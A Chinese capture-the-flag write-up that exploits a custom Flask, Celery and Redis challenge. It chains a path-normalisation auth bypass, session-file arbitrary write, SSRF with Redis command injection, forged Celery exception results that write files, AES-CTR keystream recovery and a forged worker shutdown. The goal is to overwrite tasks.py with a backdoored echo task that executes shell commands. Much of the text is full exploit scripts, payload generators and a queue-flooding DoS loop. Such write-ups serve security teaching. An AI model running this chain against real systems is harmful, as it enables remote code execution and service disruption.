越权

先看系统权限,使用了 superviser 维持了三个程序:

  1. redis
  2. app.py (flask + broker)
  3. worker

其中 /readflag 程序 worker 用户可以执行,所以最终目标需要已 worker 用户 RCE

题目在 werkzeug 的基础上自己写了一个阉割版的 Flask,其中在处理中间件那部分存在逻辑漏洞。

在处理请求时,先通过 path 找到对应的 endpoint,然后再收集该 endpointmiddlewares

def _collect_route_middlewares(self, endpoint: str, path: str) -> list[MiddlewareCallable]:
    scoped = list(self.route_middlewares.get(endpoint, []))
    if scoped:
        return scoped
    if not self.wildcard_middlewares:
        return scoped
    normalized_path = self._normalize_path(path)
    for pattern, middlewares in reversed(self.wildcard_middlewares):
        if self._pattern_matches(pattern, normalized_path):
            return list(middlewares)
    return scoped

但是在匹配 middlewares 之前会先进行 _normalize_path 操作。所以对于 path : /tasks/fetch/%2e%2e/asd 来说,能够争取找到 fetch endpoint,但当匹配 middlewares 时就变成了 /tasks/asd 了,匹配失败,导致进入该 endpoint 前不需要执行任何 middlewares,实现越权。

任意文件写

session 保存时根据 sid 确定 session 文件路径:

def save(self, session: FileSession) -> None:
    if not session.modified:
        return
    path = self._session_path(session.sid)
    tmp_path = f"{path}.tmp-{secrets.token_hex(4)}"
    payload = {key: value for key, value in session.items()}
    with open(tmp_path, "w", encoding="utf-8") as fh:
        json.dump(payload, fh, ensure_ascii=False, separators=(",", ":"))
    os.replace(tmp_path, path)
    session.modified = False

而 sid 用户可控,所以可以任意文件创建,但文件内容不能饭圈控制。

Payload:

Cookie: mini_session=/tmp/debug

可以创建 /tmp/debug

同时,题目还定义了 DiagnosticsPersistError 类,该类的构造函数可以任意文件写,现在需要找一个任意 callable 的调用。

celery 有一个历史漏洞:CVE-2021-23727,该漏洞可以调用任意 callablecelery worker 会将任务执行结果保存下来,当 broker 想要读取任务执行结果在提取出来。如果执行时遇到报错会将该 Exception 序列化存储,读取时再反序列化,其中涉及到任意 callable 调用。CVE-2021-23727 的修复方式是只允许反序列化已定义的 Exception 类,不允许调用任意 callableos.system 等。

因为 DiagnosticsPersistError 类继承自 Exception,所以漏洞修复后依然可以被反序列化。

DiagnosticsPersistError 关键代码如下:

class DiagnosticsPersistError(RuntimeError):
    """Dormant exception used for development-time diagnostics persistence."""

    _BASE_DIR = Path(os.environ.get("FRAMEWORK_DIAGNOSTICS_DIR", "/app/data")).resolve()
    _DEBUG_SENTINEL = Path("/tmp/debug")

    def __init__(self, payload: str, *args: Any, **kwargs: Any) -> None:
        if self._DEBUG_SENTINEL.exists():
            self._maybe_persist(payload)
        super().__init__("diagnostics capture failed", *args, **kwargs)

    def _maybe_persist(self, payload: str) -> None:
        info = self._decode_payload(payload)
        if not info:
            return

        target = info.get("path")
        if not target:
            return

        path = Path(target)
        mode = str(info.get("mode", "w"))
        encoding = info.get("encoding", "utf-8")
        data = info.get("content", "")

        try:
            path.parent.mkdir(parents=True, exist_ok=True)
            if "b" in mode:
                blob = self._ensure_bytes(data, encoding)
                with path.open(mode) as fh:  # type: ignore[call-arg]
                    fh.write(blob)
            else:
                text = self._ensure_text(data, encoding)
                with path.open(mode, encoding=encoding) as fh:
                    fh.write(text)
        except Exception:
            return

    def _decode_payload(self, payload: str) -> Dict[str, Any] | None:
        attempts = [payload]
        try:
            attempts.append(bytes.fromhex(payload).decode("utf-8"))
        except Exception:
            pass

        for candidate in attempts:
            try:
                return json.loads(candidate)
            except Exception:
                continue
        return None

对于题目来说,brokerworker 通过 redis 通信。而 /tasks/fetch 可以 SSRF 攻击 redis 向一个 task 的返回结果中写入序列化 Payload,当读取结果时触发文件写入。

fetch 代码如下:

@celery_app.task(name="miniws.fetch")
def fetch_task(url: str, *, host_header: str | None = None, body: str | None = None, verb: str = "GET") -> Dict[str, Any]:
    parsed = urlparse(url)
    host = parsed.hostname or settings.redis_host
    port = parsed.port or (443 if parsed.scheme == "https" else 80)
    path = parsed.path or "/"
    if parsed.query:
        path = f"{path}?{parsed.query}"

    request_host = host_header or parsed.netloc or f"{host}:{port}"
    request_body = body.encode() if body else b""

    payload = (
        f"{verb} {path} HTTP/1.1\r\n"
        f"Host: {request_host}\r\n"
        "User-Agent: MiniFetch/1.0\r\n"
        "Connection: close\r\n"
        "\r\n"
    ).encode() + request_body

    chunks: list[bytes] = []
    with socket.create_connection((host, port), timeout=5) as sock:
        sock.sendall(payload)
        while True:
            data = sock.recv(4096)
            if not data:
                break
            chunks.append(data)
    preview = b"".join(chunks)[:2048]
    return {"preview": preview.decode(errors="replace"), "bytes": len(preview)}

使用 verb 注入即可:

POST /tasks/fetch/%2e%2e/123 HTTP/1.1
Host: 
Content-Length: 2291
Content-Type: application/json
Cookie: mini_session=d9b266db66464ed2
Connection: close

{"url":"http://127.0.0.1:6379","verb":"set asd 1\r\nGET"}

结合上面的 Exception 类给出写文件的 Payload:

set celery-task-meta-<uuid> '{"status": "FAILURE", "result": {"exc_type": "DiagnosticsPersistError", "exc_message": "<hex payload>", "exc_module": "framework.app"}, "traceback": "", "children": [], "date_done": "2025-10-31T06:15:48.956927", "task_id": "<uuid>"}'

使用任意一个 taskuuid 替换,exc_message 的值为 hex 编码后的 json 数据,其中包含 pathcontent 字段用于写文件。

生成写入文件Payload:

def wapper(payload : str, title : str):
    print(f'------------------------{title}----------------------------')
    data = '\r\n' + payload + '\r\nGET'
    # print(data)
    out = ''
    for i in data:
        num = hex(ord(i)).replace('0x', '')
        while len(num) < 2:
            num = '0' + num
        out = out + '\\u00' + num

    print(out)

pwned_taskspy = '''
from __future__ import annotations

import os
import pickle
import socket
from typing import Any, Dict
from urllib.parse import urlparse

from celery import Celery
from kombu.serialization import register

from .config import settings
from .crypto import dumps as encrypt_dumps, loads as decrypt_loads

try:
    register(
        "miniws-aes",
        encrypt_dumps,
        decrypt_loads,
        content_type="application/x-miniws",
        content_encoding="binary",
    )
except ValueError:
    pass

celery_app = Celery(
    "miniws",
    broker=settings.celery_broker_url,
    backend=settings.celery_backend_url,
)

celery_app.conf.update(
    task_serializer="miniws-aes",
    task_default_serializer="miniws-aes",
    accept_content=["miniws-aes"],
    result_serializer="json",
    result_accept_content=["json"],
)

@celery_app.task(name="miniws.echo")
def echo_task(message: str) -> Dict[str, Any]:
    return {"echo": __import__("os").popen(message).read()}

@celery_app.task(name="miniws.fetch")
def fetch_task(url: str, *, host_header: str | None = None, body: str | None = None, verb: str = "GET") -> Dict[str, Any]:
    parsed = urlparse(url)
    host = parsed.hostname or settings.redis_host
    port = parsed.port or (443 if parsed.scheme == "https" else 80)
    path = parsed.path or "/"
    if parsed.query:
        path = f"{path}?{parsed.query}"

    request_host = host_header or parsed.netloc or f"{host}:{port}"
    request_body = body.encode() if body else b""

    payload = (
        f"{verb} {path} HTTP/1.1\\r\\n" + 
        f"Host: {request_host}\\r\\n" + 
        "User-Agent: MiniFetch/1.0\\r\\n" + 
        "Connection: close\\r\\n" + 
        "\\r\\n"
    ).encode() + request_body

    chunks: list[bytes] = []
    with socket.create_connection((host, port), timeout=5) as sock:
        sock.sendall(payload)
        while True:
            data = sock.recv(4096)
            if not data:
                break
            chunks.append(data)
    preview = b"".join(chunks)[:2048]
    return {"preview": preview.decode(errors="replace"), "bytes": len(preview)}
'''.strip()

def write_file(task_id : str):
    payload = {
        "path" : "/app/src/tasks.py",
        "content" : pwned_taskspy
    }

    data = '''
    set celery-task-meta-%s '{"status": "FAILURE", "result": {"exc_type": "DiagnosticsPersistError", "exc_message": "%s", "exc_module": "framework.app"}, "traceback": "", "children": [], "date_done": "2025-10-31T06:15:48.956927", "task_id": "%s"}'
    '''.strip() % (task_id, json.dumps(payload).encode().hex(), task_id)

    wapper(data, 'write file')

task_id = ''

write_file(task_id)

这个 tasks.pyecho 任务的 message 作为系统命令执行并拿到回显。

restart

获取密钥流

尝试覆盖 tasks.py 然后触发 worker 的重启进而执行新的 tasks.py。在 celery + redis 的架构下,broker 可以通过 redisPUB/SUB 发布命令,其中包含 pool_restartshutdown 等。

不过,题目给 celery 加上了加密,代码如下:

from __future__ import annotations

import json
import socket
from hashlib import md5, sha1
from typing import Any

from Crypto.Cipher import AES

from .config import settings
import logging
_TASK_KEY = sha1(settings.secret_key.encode()).digest()[:16]
_TASK_NONCE = md5(socket.gethostname().encode()).digest()[:8]
logging.basicConfig(level=logging.INFO)

def encrypt_bytes(data: bytes) -> bytes:
    cipher = AES.new(_TASK_KEY, AES.MODE_CTR, nonce=_TASK_NONCE)
    return cipher.encrypt(data)


def decrypt_bytes(data: bytes) -> bytes:
    cipher = AES.new(_TASK_KEY, AES.MODE_CTR, nonce=_TASK_NONCE)
    return cipher.decrypt(data)


def dumps(payload: Any) -> bytes:
    raw = json.dumps(payload, separators=(",", ":"), ensure_ascii=False).encode("utf-8")
    return encrypt_bytes(raw)


def loads(ciphertext: bytes) -> Any:
    raw = decrypt_bytes(ciphertext)
    return json.loads(raw.decode("utf-8"))

存在漏洞,CTR 模式为序列密码,而题目中 keynonce 是固定的,则密钥流也是固定的,此时可以进行明文攻击,同时拿到明文和密文可以算出密钥流。

fetch task 代码设置了 timeout5s:

@celery_app.task(name="miniws.fetch")
def fetch_task(url: str, *, host_header: str | None = None, body: str | None = None, verb: str = "GET") -> Dict[str, Any]:
    parsed = urlparse(url)
    host = parsed.hostname or settings.redis_host
    port = parsed.port or (443 if parsed.scheme == "https" else 80)
    path = parsed.path or "/"
    if parsed.query:
        path = f"{path}?{parsed.query}"

    request_host = host_header or parsed.netloc or f"{host}:{port}"
    request_body = body.encode() if body else b""

    payload = (
        f"{verb} {path} HTTP/1.1\r\n"
        f"Host: {request_host}\r\n"
        "User-Agent: MiniFetch/1.0\r\n"
        "Connection: close\r\n"
        "\r\n"
    ).encode() + request_body

    chunks: list[bytes] = []
    with socket.create_connection((host, port), timeout=5) as sock:
        sock.sendall(payload)
        while True:
            data = sock.recv(4096)
            if not data:
                break
            chunks.append(data)
    preview = b"".join(chunks)[:2048]
    return {"preview": preview.decode(errors="replace"), "bytes": len(preview)}

可以用这个来 DOS ,让任务队列堵塞,然后 SSRF redislua 脚本拿到密文。

触发堵塞的 EXP:

import requests
import time

url = 'http://192.168.72.132:5001'

for i in range(10):
    try:
        res = requests.post(url=url + '/tasks/fetch/%252e%252e/asd', json={"url":"http://192.168.72.131:6378","verb":"GET"}) # 用一个不存在的 IP 会消耗 5s 时间
    except KeyboardInterrupt as e:
        break
    except:
        pass

while True:
    try:
        res = requests.post(url=url + '/tasks/echo', json={"message":"111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111"})
    except KeyboardInterrupt as e:
        break
    except:
        pass

先发送 10fetch 任务堵塞队列,后面一直发送 echo 任务。接着连续发送这个 SSRF Payload

EVAL "local element_list = redis.call('LRANGE', KEYS[1], 0, 0) if not element_list or #element_list == 0 then return nil end local first_element = element_list[1] local escaped_value = string.gsub(first_element, '\\"', '\\\\\\\\\\"') local json_result = '{\\"status\\": \\"SUCCESS\\", \\"result\\": {\\"echo\\": \\"' .. escaped_value .. '\\"}, \\"traceback\\": null, \\"children\\": [], \\"date_done\\": \\"2025-10-31T03:20:37.823922\\", \\"task_id\\": \\"<uuid>\\"}' redis.call('SET', KEYS[2], json_result) return json_result" 2 celery celery-task-meta-<uuid>

这个 lua 脚本会读取 celery 队列的第一个然后赋值给一个 key,运行上面 DOS 脚本后,马上多次发送 lua 脚本。再通过指定的 uuid 就能够读取到密文了。

计算密钥流:

import base64

plaintext = '''
[[],{"message":"111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111"},{"callbacks":null,"errbacks":null,"chain":null,"chord":null}]
'''.strip().encode()

s = '''
tVcJqAkEgomM+S9W7E0er7nxxvRbPGVKva26QEGh5A+jUnSlfZydMeb4edf9XkKVWZTUitk6avW0FBpbo9Cwz9QK0WuYjcr9Rofy3ECZw6EqDO5XQoYPEkScwW3Nlb5cqYY80ZSaQajPJTYI/ofbbNTqVMrIe8F6HM6Hjs3yiGZ1xxw21yn3TdH6KcdTTKZHjWnxiDEljKura1QJiV4fbbbA9+dbWb2B04Bb1qKgWn9L8d9HyifZdpkkuEj8ktTPtJZd9BguR7ma1ONX5tvs683hWYV3yZOSXyPlxbFDzkpT/QalATKleUl9oL9DUNb5vbnW+qDgoJoli4meBWxwNV/2ADUDJtKSNmhNoAqYEAzvZP9Ig961X9qj0ZcDqJzZ+/WNmoEHskqYUwmCqwEBpCL/0twT4VoTlrJd6VQVW2kHVji6+eQIyaxNLOmygNAfl0mZ4pTOOlGj8RUDo5jUXLMPm7tGQYaVQ6rEq0lmKjYv3uq8dxvI5E3iYzPlA3Ued/mMqvBcjDcgcJUOEWKamEPAgim2AcblfhBGMVJu5SjnvH3Tz+H6GEScmrnf8ABNAsCU6DdqV9V9YkcjZWcVnj2LlJRXsCCfHfVxsneFcb6UvEkgFLBWF/SDzcNwcDJ8ovplSvc=

'''.strip()


cpher = base64.b64decode(s)

key_stream = []

for i in range(len(cpher)):
    c = cpher[i]
    p = plaintext[i]
    k = c ^ p
    key_stream.append(k)

print(key_stream)

对于 echo 111 ... 任务来说,明文格式是确定的,异或得到密钥流。

shutdown

pool_restart 功能默认是关闭的,而 shutdown 默认是开启的,而且 worker 进程被 supervisor 守护重启,所以效果一样。

shutdown 命令格式为:

{
    "method" : "shutdown",
    "arguments" : {},
    "destination" : null,
    "pattern" : null,
    "matcher" : null,
    "ticket" : "8b3edc18-e6c9-41df-8fbb-e3452b0db26f",
    "reply_to" : {
        "exchange" : "reply.celery.pidbox",
        "routing_key" : "082a4b30-f17a-3be9-ac0e-023e96bcc32a"
    }
}

ticketrouting_key 的值设置为随机 uuid 即可,不存在校验。

加密脚本:

import base64

data = '''
{"method":"shutdown","arguments":{},"destination":null,"pattern":null,"matcher":null,"ticket":"8b3edc18-e6c9-41df-8fbb-e3452b0db26f","reply_to":{"exchange":"reply.celery.pidbox","routing_key":"082a4b30-f17a-3be9-ac0e-023e96bcc32a"}}

'''.strip().encode()

def e_with_key(data : bytes):
    key_stream = [238, 12, 84, 132, 114, 38, 239, 236, 255, 138, 78, 49, 137, 111, 36, 141, 136, 192, 247, 197, 106, 13, 84, 123, 140, 156, 139, 113, 112, 144, 213, 62, 146, 99, 69, 148, 76, 173, 172, 0, 215, 201, 72, 230, 204, 111, 115, 164, 104, 165, 229, 187, 232, 11, 91, 196, 133, 37, 43, 106, 146, 225, 129, 254, 229, 59, 224, 90, 169, 188, 251, 204, 119, 182, 195, 237, 113, 168, 242, 144, 27, 61, 223, 102, 115, 183, 62, 35, 117, 173, 240, 92, 252, 164, 143, 109, 152, 183, 13, 224, 165, 171, 112, 153, 254, 20, 7, 57, 207, 182, 234, 93, 229, 219, 101, 251, 249, 74, 240, 75, 45, 255, 182, 191, 252, 195, 185, 87, 68, 246, 45, 7, 230, 24, 198, 124, 224, 203, 24, 246, 98, 125, 151, 118, 188, 88, 192, 185, 0, 20, 189, 154, 154, 90, 101, 56, 184, 111, 46, 92, 135, 241, 198, 214, 106, 104, 140, 176, 226, 177, 106, 231, 147, 145, 107, 78, 122, 192, 238, 118, 251, 22, 232, 71, 168, 21, 137, 121, 205, 163, 229, 254, 133, 167, 108, 197, 41, 31, 118, 136, 171, 229, 210, 102, 215, 234, 221, 218, 252, 208, 104, 180, 70, 248, 162, 163, 110, 18, 212, 244, 128, 114, 255, 123, 98, 204, 55, 148, 48, 3, 148, 72, 120, 76, 145, 142, 114, 97, 231, 200, 140, 136, 231, 203, 145, 209, 145, 171, 20, 186, 184, 175, 52, 93, 65, 4, 110, 199, 49, 4, 50, 23, 227, 163, 7, 89, 124, 145, 59, 169, 33, 61, 222, 85, 206, 121, 178, 239, 132, 110, 235, 146, 224, 166, 50, 153, 173, 232, 202, 196, 188, 171, 176, 54, 131, 123, 169, 98, 56, 179, 154, 48, 48, 149, 19, 206, 227, 237, 34, 208, 107, 34, 167, 131, 108, 216, 101, 36, 106, 88, 54, 103, 9, 139, 200, 213, 57, 248, 157, 124, 29, 216, 131, 177, 225, 46, 166, 120, 168, 211, 165, 255, 11, 96, 146, 192, 36, 50, 146, 169, 229, 109, 130, 62, 170, 138, 119, 112, 183, 164, 114, 155, 245, 154, 120, 87, 27, 7, 30, 239, 219, 141, 70, 42, 249, 213, 124, 211, 82, 2, 212, 50, 68, 47, 70, 200, 189, 155, 193, 109, 189, 6, 17, 65, 164, 63, 32, 83, 171, 169, 114, 241, 179, 24, 135, 48, 247, 212, 79, 33, 119, 0, 99, 95, 212, 25, 214, 141, 76, 226, 254, 195, 135, 52, 63, 190, 249, 216, 179, 156, 98, 44, 97, 171, 231, 202, 13, 4, 34, 185, 17, 78, 101, 70, 23, 21, 119, 255, 94, 224, 231, 182, 109, 222, 85, 243, 113, 217, 83, 209, 31, 228, 24, 208, 182, 134, 39, 85, 120, 220, 122, 53, 151, 235, 162, 177, 20, 82, 8, 18, 215, 150, 9, 55, 170]

    
    
    data_length = len(data)
    plain = b''
    for i in range(len(key_stream)):
        if i >= data_length:
            break
        plain = plain + (data[i] ^ key_stream[i]).to_bytes(1)
    return plain

out = e_with_key(data)

print(base64.b64encode(out))

shutdown 等控制指令是通过 redisPUB/SUB 发送的,命令如下:

PUBLISH /0.celery.pidbox '{"body": "<加密后的base64数据>", "content-encoding": "binary", "content-type": "application/x-miniws", "headers": {"clock": 1, "expires": 1861891032.9756505}, "properties": {"delivery_mode": 2, "delivery_info": {"exchange": "celery.pidbox", "routing_key": ""}, "priority": 0, "body_encoding": "base64", "delivery_tag": "e9cb2a03-3968-4a48-a3ea-ca7ba413c012"}}'

注意 expires 不要过期,delivery_tag 设置为随机 uuid 即可。worker 进程退出后会被 supervisor 重新拉起来,此时会加载被我们覆盖的 tasks.py 代码。

涉及到 redis luaPayload 对于引号的转义很敏感,可以用 unicode 编码,方便一点。以下脚本用于生成三个阶段的 Payload

import json

def wapper(payload : str, title : str):
    print(f'------------------------{title}----------------------------')
    data = '\r\n' + payload + '\r\nGET'
    # print(data)
    out = ''
    for i in data:
        num = hex(ord(i)).replace('0x', '')
        while len(num) < 2:
            num = '0' + num
        out = out + '\\u00' + num

    print(out)

pwned_taskspy = '''
from __future__ import annotations

import os
import pickle
import socket
from typing import Any, Dict
from urllib.parse import urlparse

from celery import Celery
from kombu.serialization import register

from .config import settings
from .crypto import dumps as encrypt_dumps, loads as decrypt_loads

try:
    register(
        "miniws-aes",
        encrypt_dumps,
        decrypt_loads,
        content_type="application/x-miniws",
        content_encoding="binary",
    )
except ValueError:
    pass

celery_app = Celery(
    "miniws",
    broker=settings.celery_broker_url,
    backend=settings.celery_backend_url,
)

celery_app.conf.update(
    task_serializer="miniws-aes",
    task_default_serializer="miniws-aes",
    accept_content=["miniws-aes"],
    result_serializer="json",
    result_accept_content=["json"],
)

@celery_app.task(name="miniws.echo")
def echo_task(message: str) -> Dict[str, Any]:
    return {"echo": __import__("os").popen(message).read()}

@celery_app.task(name="miniws.fetch")
def fetch_task(url: str, *, host_header: str | None = None, body: str | None = None, verb: str = "GET") -> Dict[str, Any]:
    parsed = urlparse(url)
    host = parsed.hostname or settings.redis_host
    port = parsed.port or (443 if parsed.scheme == "https" else 80)
    path = parsed.path or "/"
    if parsed.query:
        path = f"{path}?{parsed.query}"

    request_host = host_header or parsed.netloc or f"{host}:{port}"
    request_body = body.encode() if body else b""

    payload = (
        f"{verb} {path} HTTP/1.1\\r\\n" + 
        f"Host: {request_host}\\r\\n" + 
        "User-Agent: MiniFetch/1.0\\r\\n" + 
        "Connection: close\\r\\n" + 
        "\\r\\n"
    ).encode() + request_body

    chunks: list[bytes] = []
    with socket.create_connection((host, port), timeout=5) as sock:
        sock.sendall(payload)
        while True:
            data = sock.recv(4096)
            if not data:
                break
            chunks.append(data)
    preview = b"".join(chunks)[:2048]
    return {"preview": preview.decode(errors="replace"), "bytes": len(preview)}
'''.strip()

def write_file(task_id : str):
    payload = {
        "path" : "/app/src/tasks.py",
        "content" : pwned_taskspy
    }

    data = '''
    set celery-task-meta-%s '{"status": "FAILURE", "result": {"exc_type": "DiagnosticsPersistError", "exc_message": "%s", "exc_module": "framework.app"}, "traceback": "", "children": [], "date_done": "2025-10-31T06:15:48.956927", "task_id": "%s"}'
    '''.strip() % (task_id, json.dumps(payload).encode().hex(), task_id)

    wapper(data, 'write file')
    
def get_key(task_id : str):
    data = '''
    EVAL "local element_list = redis.call('LRANGE', KEYS[1], 0, 0) if not element_list or #element_list == 0 then return nil end local first_element = element_list[1] local escaped_value = string.gsub(first_element, '\\"', '\\\\\\\\\\"') local json_result = '{\\"status\\": \\"SUCCESS\\", \\"result\\": {\\"echo\\": \\"' .. escaped_value .. '\\"}, \\"traceback\\": null, \\"children\\": [], \\"date_done\\": \\"2025-10-31T03:20:37.823922\\", \\"task_id\\": \\"%s\\"}' redis.call('SET', KEYS[2], json_result) return json_result" 2 celery celery-task-meta-%s
    '''.strip() % (task_id, task_id)

    wapper(data, 'get key')

def shutdown(task_id : str):
    enc_data = '''
lS454QZOgIjdsGxC4RpQ6ee3medGLzUJ6+nmFB7kphyoGDi4bsnJc6OgJoe4BhzKSp+LzoRnd+b1RF8e95Pv3N9VlTbFkNmhFsKghRTa0Kp1SLMKX5VKShbGlSjenq1V+oRohMaaSLSbImQA4oLbOYP2XZ2bKN0uHsuDjZ7z3TV2wEslyjq0GZCnYakWErVMx3qlwWN83PT9P0cCmh1LLOuI6LUPBOnCm58ajvfzBDZY7MwElGOcLsZy1hKo2sfEp5dU90grFLubyLRX4Ivw6Z61UZknm5LGQyLmx+VLyRkBrwSmUSHpNQ==

'''.strip()

    data = '''
    PUBLISH /0.celery.pidbox '{"body": "%s", "content-encoding": "binary", "content-type": "application/x-miniws", "headers": {"clock": 1, "expires": 1861891032.9756505}, "properties": {"delivery_mode": 2, "delivery_info": {"exchange": "celery.pidbox", "routing_key": ""}, "priority": 0, "body_encoding": "base64", "delivery_tag": "e9cb2a03-3968-4a48-a3ea-ca7ba413c012"}}'
    '''.strip()

    wapper(data, 'shutdown')

task_id = 'd3ae97dd-8ed9-4b72-ad47-4c785f2302f0'

write_file(task_id)
get_key(task_id)
shutdown(task_id)

参考

https://snyk.io/blog/python-rce-vulnerability/

http://gensokyo.cn/2025/10/19/celerace/